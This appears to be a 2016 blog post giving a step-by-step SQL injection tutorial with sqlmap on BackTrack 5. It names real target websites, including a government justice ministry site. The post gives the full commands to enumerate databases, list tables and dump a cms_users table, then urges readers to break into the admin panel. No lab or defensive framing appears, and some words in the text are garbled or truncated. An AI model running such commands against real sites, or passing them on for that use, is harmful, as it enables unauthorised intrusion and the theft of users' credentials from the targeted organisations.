Wednesday, May 18, 2016
HOW TO ALMOST EVERYSITES WITH BACK TRACK
Start
- - - - - - - - - -
First of all you must to find some vuln sites...
Our target is :http://www.zwcad.org/
vuln :http://www.zwcad.org/download_form.p?id=107
to se if it is vuln try to add ' on url, like this :
http://www.zwcad.org/download_form.p?id=107'
- - - - - - - - - - - - - - - - - - - - - - - - - -
now when we have some vuln sites we can open a sqlmap...
Start>Backtrack>ation Tools>Web ation Tools>sqlmap
This is on a BackTrack 5...
- - - - - - - - - - - - - - - - - - - - - - - - - - - -
Now we must type some commands..
python sqlmap.py -uhttp://www.justice.gov.al/index.p?gj=gj1--dbs
It looks like this :
http://www.dodaj.rs/f/3h/Ol/2VNj3k6R/step1.jpg
when we hit the ENTER the scan is started and when scan is over we will get database's
LOOK LIKE THIS-http://www.dodaj.rs/f/1T/10G/4I87LTyn/wewilotesomething.jpg
Then we must put another commands to start srching a tables..
that command is :
python sqlmap.py -u http://www.justice.gov.al/index.p?gj=gj1 -D justice2011DB --tables
When you hit the enter the tables seraching is started and when it's over we get this info
PICTURE HERE-http://www.dodaj.rs/f/3/O2/1tsCrIS3/tablessrching.jpg
Now we must type a third command for srching columns, but dirst we must to chose a one table to get columns. I chose a cms_users table..
python sqlmap.py -uhttp://www.justice.gov.al/index.p?gj=gj1-D justice2011DB -T cms_users --dump
And you will get this :
PICTURE HERE-http://www.dodaj.rs/f/12/1I/2Cv7DPis/end.jpg
You can to this too : Step by step..
To type a command for coloumns :
python sqlmap.py -u http://www.justice.gov.al/index.p?gj=gj1 -D justice2011DB -T cms_users -C herethecolumnname --dump
With this command we will get a info about one column..
Like this :http://www.dodaj.rs/f/38/Bc/2h9WLcuY/columnss.jpg
Ypu always can find your files fump in : /pentest/web/scanners/sqlmap/output/
Now when we get the all info, we only must to find a admin panel and to log in and FUCK THEM !!!
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment